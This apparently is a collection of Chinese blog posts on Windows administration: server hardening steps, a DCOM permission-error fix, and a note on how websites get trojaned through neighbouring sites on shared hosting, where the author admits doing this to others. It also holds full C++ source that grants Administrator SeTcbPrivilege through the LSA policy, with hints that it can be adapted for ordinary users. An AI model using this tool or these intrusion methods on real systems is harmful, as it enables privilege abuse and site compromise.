我们一般关闭如下服务 Computer Browser Help and Support Messenger Print Spooler Remote Registry TCP/IP NetBIOS Helper 如果服务器不用作域控,我们也可以禁用 Workstation 11.取消危险组件 如果服务器不需要FSO regsvr32 /u c:\windows\system32\scrrun.dll 注销组件 使用regedit 将/HKEY_CLASSES_ROOT下的 WScript.Network WScript.Network.1 WScript.Shell WScript.Shell.1 Shell.Application Shell.Application.1 键值改名或删除 将这些键值下CLSID中包含的字串 如{72C24DD5-D70A-438B-8A42-98424B88AFB8} 到/HKEY_CLASSES_ROOT/CLSID下找到以这些字串命名的键值 全部删除 12.审计 本地安全策略->本地策略->审核策略 打开以下内容 审核策略更改 成功,失败 审核系统事件 成功,失败 审核帐户登陆事件 成功,失败 审核帐户管理 成功,失败 运行regedit,找到[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp], 看到右边的PortNumber了吗?在十进制状态下改成你想要的端口号吧,比如7126之类的,只要不与其它冲突即可。 第二处HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp, 方法同上,记得改的端口号和上面改的一样就行了。 -
Windows权限
2008-05-05 01:21:40
如何超越Windows2000赋予的ADMINISTRATOR权限!虽然Admin权利大,但不是最大
NT的安全组件里有一个叫Local Security Authority Protected Subsystem.当我们以ADMIN
ISTRATOR登陆时,系统根据缺省的授权,赋予ADMINISTRATOR16个授权.下面乃是详细的清单.
SeChangeNotifyPrivilege
SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeSystemtimePrivilege
SeShutdownPrivilege
SeRemoteShutdownPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeLoadDriverPrivilege
SeCreatePagefilePrivilege
SeIncreaseQuotaPrivilege
其中 SeChangeNotifyPrivilege是缺省打开的.其他则需要调整TOKEN来打开.拥有了这么多的
权限后,ADMIN真可谓强大,没有任何其他用户拥有这么多的权限了.但是,仍然有几个更有威力
的权限没有赋予ADMIN.那就是SeTcbPrivilege和SeCreateTokenPrivilege. SeTcbPrivilege
表示当前用户的操作代表了系统的操作,SeCreateTokenPrivilege更可赤裸裸地为任意令牌创
建权限.乃是无上的特权.如果任何人拥有了这两个权限,在NT世界的权利就太夸张了.所以,N
T根本就不给任何用户以这两个权限.
出于对权利的渴望,通常病毒,HACKER都会想法获取最高权限.现在,由于NT的保护,直接地获取
这2个权限是不行了.那么就需要饶个弯子了.
由于没有直接的API可以增加TOKEN的特权,我们只好通过LSA POLICY库调整用户权限.因为用
户权限在LSA POLICY库里被提取出来.当LSA POLICY库里增加了一个特权,用户可以在下一个
进程里打开该特权.HEHE... ADMIN组对LSA POLICY库有写权.:DDD ADMIN没有超级特权,LSA对
用户的特权从POLICY库里提取... 真是个可爱的连环套啊. :)
下面是我写的程序,打开ADMINISTRATOR的SeTcbPrivilege特权.尽管我在程序里面设置了ADM
IN检查,但是通过少量的改写就可以时普通用户获取一些超级权限.:)里面的小技巧大家自己
通常可以动出脑筋的.当然并不是通过删除ADMINISTRATOR检验就可以完成的. :)
当然,这里有编译好的版本供下载.
/*++
sec.cpp
#define UNICODE
#include <windows.h>
#include <iostream.h>
#include <stdio.h>
#include <ntsecapi.h>//
//Global vars
//
LSA_HANDLE PolicyHandle;
PSID Sid=0;
DWORD cbSid=0;
LPTSTR ReferencedDomainName=0;
DWORD cbReferencedDomainName=0;
SID_NAME_USE peUse;
PUNICODE_STRING UserRights=0; //UnicodeString Pointer to PRIVILEGE
ULONG Count=0; //
WCHAR textSid[200];
HANDLE token=0;
PTOKEN_PRIVILEGES TokenInformation=0;
BOOL owned=0;//
//quit
//
void quit(int err){
if (Sid) delete Sid;
if (ReferencedDomainName) delete ReferencedDomainName;
if (UserRights) delete UserRights;
if (TokenInformation) delete TokenInformation;
if (token) CloseHandle(token);
if (PolicyHandle) LsaClose(PolicyHandle);wprintf(L"\n\nWritten by Lu Lin. 2000.1.30\nLicence: Freeware.\n");
if (err){
exit(0xc0000000);
}
else {
exit(0);
}
}void printprivilege(LUID_AND_ATTRIBUTES* luid){
WCHAR dispname[100];
ULONG cb=100;if (!LookupPrivilegeName(
0,
&(luid->Luid),
dispname,
&cb)){
wprintf(L"I can't translate SOME LUID to privilege!\n");
exit(1);
}wprintf(L"\tPrivilege: %s\n",dispname);
if (!_wcsicmp(dispname,L"SeTcbPrivilege")) owned=1;
switch (luid->Attributes){
case SE_PRIVILEGE_ENABLED_BY_DEFAULT:
wprintf(L"\t\tThis privilege is enabled by default\n");
break;
case SE_PRIVILEGE_ENABLED:
wprintf(L"\t\tThis privilege is enabled.\n");
break;
case SE_PRIVILEGE_USED_FOR_ACCESS:
wprintf(L"\t\tThis privilege is used for access.\n");
break;
case 3:
wprintf(L"\t\tThis privilege is always on for you.\n");
break;
case 0:
wprintf(L"\t\tThis privilege you owned has not been enabled yet.\n");
}
}void init(){
WCHAR username[30];
ULONG cb;
OSVERSIONINFO osv;//if nt?
ZeroMemory(&osv,sizeof(osv));
osv.dwOSVersionInfoSize=sizeof(osv);
GetVersionEx(&osv);
if (!osv.dwPlatformId&VER_PLATFORM_WIN32_NT){
wprintf(L"This program only runs on NT");
quit(1);
}//
//Check if this thread is executed inside administrator's context.
//
cb=30;
GetUserName(username,&cb);
if (_wcsicmp(username,L"administrator")){
wprintf(L"Logon as administrator first!\n");
quit(1);
}wprintf(L"WINDOWS NT %i.%i Build %i %s\n\n",
osv.dwMajorVersion,
osv.dwMinorVersion,
osv.dwBuildNumber,
osv.szCSDVersion);
}BOOL GetTextualSid(
PSID pSid, // binary Sid
LPTSTR TextualSid, // buffer for Textual representation of Sid
DWORD dwBufferLen // required/provided TextualSid buffersize
)
{
PSID_IDENTIFIER_AUTHORITY psia;
DWORD dwSubAuthorities;
DWORD dwSidRev=SID_REVISION;
DWORD dwCounter;
DWORD dwSidSize;// Validate the binary SID.
if(!IsValidSid(pSid)) return FALSE;
// Get the identifier authority value from the SID.
psia = GetSidIdentifierAuthority(pSid);
// Get the number of subauthorities in the SID.
dwSubAuthorities = *GetSidSubAuthorityCount(pSid);
// Compute the buffer length.
// S-SID_REVISION- + IdentifierAuthority- + subauthorities- + NULLdwSidSize=(15 + 12 + (12 * dwSubAuthorities) + 1) * sizeof(TCHAR);
// Check input buffer length.
// If too small, indicate the proper size and set last error.if (dwBufferLen < dwSidSize)
{
SetLastError(ERROR_INSUFFICIENT_BUFFER);
return FALSE;
}// Add 'S' prefix and revision number to the string.
dwSidSize=wsprintf(TextualSid, TEXT("S-%lu-"), dwSidRev );
// Add SID identifier authority to the string.
if ( (psia->Value[0] != 0) || (psia->Value[1] != 0) )
{
dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),
TEXT("0x%02hx%02hx%02hx%02hx%02hx%02hx"),
(USHORT)psia->Value[0],
(USHORT)psia->Value[1],
(USHORT)psia->Value[2],
(USHORT)psia->Value[3],
(USHORT)psia->Value[4],
(USHORT)psia->Value[5]);
}
else
{
dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),
TEXT("%lu"),
(ULONG)(psia->Value[5] ) +
(ULONG)(psia->Value[4] << 8) +
(ULONG)(psia->Value[3] << 16) +
(ULONG)(psia->Value[2] << 24) );
}// Add SID subauthorities to the string.
//
for (dwCounter=0 ; dwCounter < dwSubAuthorities ; dwCounter++)
{
dwSidSize+=wsprintf(TextualSid + dwSidSize, TEXT("-%lu"),
*GetSidSubAuthority(pSid, dwCounter) );
}return TRUE;
}void main(){
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
ZeroMemory(&ObjectAttributes,sizeof(ObjectAttributes));init();
//
//First open LSA policy database
//the call returns a NTSTATUS. NTSTATUS 0 means everything is OK.
//
if (LsaOpenPolicy(
0,
&ObjectAttributes,
GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE,
&PolicyHandle
)){
wprintf(L"Open Policy error!\n");
}
else {
Sid=new char[500];
ReferencedDomainName=new WCHAR[100];
cbSid=500;
cbReferencedDomainName=100;//
//Show Administrator SID
//
if (!LookupAccountName(
0,
L"Administrator",
Sid,
&cbSid,
ReferencedDomainName,
&cbReferencedDomainName,
&peUse
)){
wprintf(L"Damn, I can't find out the account looking for!\n");
quit(1);
}
if (!GetTextualSid(Sid,textSid,200)){
wprintf(L"Damn, Get textual SID error! Maybe a bug in this program.\n");
quit(1);
}wprintf(L"The SID of administrator is: %s \n",textSid);
wprintf(L"\tOn the server: %s\n",ReferencedDomainName);//
//Check current privilege
//
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_QUERY,
&token)){
wprintf(L"Can't open process token! What's happened?\n");
quit(1);
}TokenInformation=(PTOKEN_PRIVILEGES)(new char[2000]);
if (!GetTokenInformation(
token,
TokenPrivileges,
(void*)TokenInformation,
2000,
&cbSid //Note, Returned lenght of token information.
)){
wprintf(L"Can't get token information\n");
quit(1);
}
else{
LUID_AND_ATTRIBUTES *luid;
luid=(LUID_AND_ATTRIBUTES *)&TokenInformation->Privileges;wprintf(L"\nTotal privilege count: %i\n\n",TokenInformation->PrivilegeCount);
for (Count=0;Count<TokenInformation->PrivilegeCount;
Count++,luid++){
printprivilege(luid);
}
}//
//Add SeTchPrivilege to Administrator if not owned yet!
//
if (!owned){
UserRights=new LSA_UNICODE_STRING;
UserRights->Buffer=L"SeTcbPrivilege";
UserRights->MaximumLength=28;
UserRights->Length=28;if (LsaAddAccountRights(
PolicyHandle,
Sid,
UserRights,
1
)){
wprintf(L"Damn! Add right failed! :(\n");
quit(1);
}
else wprintf(L"\nAdd SeTcbPrivilege successfully!\n");quit(0);
}
else {
wprintf(L"\nYou own SeTcbPrivilege. I don't add it for you.\n");
}
}
} -
应用程序-特定权限设置未将COM 服务器应用程序
2008-05-05 00:55:28
应用程序-特定权限设置未将COM 服务器应用程序
在事件查看器中,可以看到:
应用程序-特定权限设置未将COM 服务器应用程序(CLSID 为
{A9E69610-B80D-11D0-B9B9-00A0C922E750}
)的 本地 激活 权限授予用户 IBM-D882681D063\IWAM_IBM-D882681D063 SID (S-1-5-21-1304240173-3011969147-3728014682-1013)。可以使用组件服务管理工具修改此安全权限。
有关更多信息,请参阅在 http://go.microsoft.com/fwlink/events.asp" ... soft.com/fwlink/events.asp 的帮助和支持
最后又查阅了大量的英文资料,采用如下的方法:
点击“开始”-“控制面板”-“管理工具”-“组件服务”-“计算机”-“我的电脑”-“DCOM”选项,
选择其下的“IIS ADMIN SERVICE”,右健选择“属性”,找到“安全”,在“启动和激活权限”中编辑“自定义”,添加帐号“IWAM_*****”,
给该帐号赋予“本地启动”和“本地激活”的权限,重新启动IIS,(点“开始”-“运行”-“CMD”,点确定,然后运行IISRESET),
运行HTTP://LOCALHOST,一切OK。
最近几天一直为事件查看器中事件ID:10016的问题所困惑.
描述为:
计算机-默认 权限设置未将 COM 服务器应用程序(CLSID 为
{0C0A3666-30C9-11D0-8F20-00805F2CD064}
)的 本地 激活 权限授予用户 NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20)。可以使用组件服务管理工具修改此安全权限。
有关更多信息,请参阅在 http://go.microsoft.com/fwlink/events.asp 的帮助和支持中心。
这个错误是在用http://localhost(http://localhost/) 登录自己的www服务时产生的:
启动IIS/www服务,在IE窗口一输入http://localhost(http://localhost/) 并回车,就会出现这个错误。当然这不影响浏览。
重启IIS/www服务,并打开一个新窗口(在原窗口不会发生错误),还用http://localhost(http://localhost/) ,同样的错误还会发生。
尝试一
按照错误提示,在管理工具打开组件服务(或运行dcomcnfg.exe),DCOM配置/Machine Debug Manager/安全/启动和激活权限,添加Network Service的激活权限,无效。
而在网上看到,win2003 sp1会出现{BA126AD1-2166-11D1-B1D0-00805FC1270E}的DCOM的同样错误,那里的解决方法也是这样的方法:只不过是对netman而不是Machine Debug Manager。
但是现在这样做怎么无效呢?
尝试二
继续寻找方法:
http://www.eventid.net/display.a...ce=DCOM&phase=1
提供的方法是,将Machine Debug Manager/安全/启动和激活权限 设为默认即可。
多次试了这个方法,仍然无效。
怎么办?
于是尝试三:regedit, HKEY_CLASSES_ROOT\CLSID\{0C0A3666-30C9-11D0-8F20-00805F2CD064}
添加Network Service的权限(当然我也认为这是错误的方法),无效,于是将Network Service仍然去掉。
重新用尝试二,这次不再有错误提示了。
可以肯定第一次用尝试二时,步骤并没有错误。问题虽然解决,但不解得很。
经过检查,可以肯定:
1.这种DCOM错误的确是在win2003打了sp1之后出现的,在这之前并没有这种错误出现;
2.第一次用尝试二时.Machine Debug Manager/安全 的三个选项全是自定义;将它们设为默认后,不能使这种DCOM错误消失;而使用了尝试三再用尝试二,的确解决了问题. -
看到一些网站被挂木马的说明
2008-05-02 01:30:30
别忽视了IDC服务器商的风险哦,我告诉你~对于黑客来说~为了挂你的站,常常不是使用对点方式的破解,而选择旁注入的方法,他们的方法就是破解与你同一个服务器上的其他网站,不要不信,别人要知道你网站的邻居有哪些轻松的很(进这个网站自己查查看同一ip下的所有网站,输入你的ip地址就可以了http://www.myipneighbors.com/),破解你同一服务器上的其他用户,让你挂马也是很轻松的了(我用这个方法就挂过别人的网站)。对于一些好的服务器尚对于这个限制的厉害,就不会出现这个问题。
还有就是你开启的用户上传这一栏最好严格控制一下,这个也比较关键,如果黑客不是破解你后台的话,挂你马也就难多了,因为他们需要上传一个挂马工具上来,如果你已经被挂马了,切记要检查下你的网站是不是允许上传html.php.asp等文件了。
不可抗拒的自然因素,比如一个超级顶级黑客要挂你的网站,我怕很多没有毛病的东西都会有毛病了,相信我一句话,挂马的黑客都是一些菜鸟黑客和工具黑客,做好以上,那些黑客就不知道怎么做了。
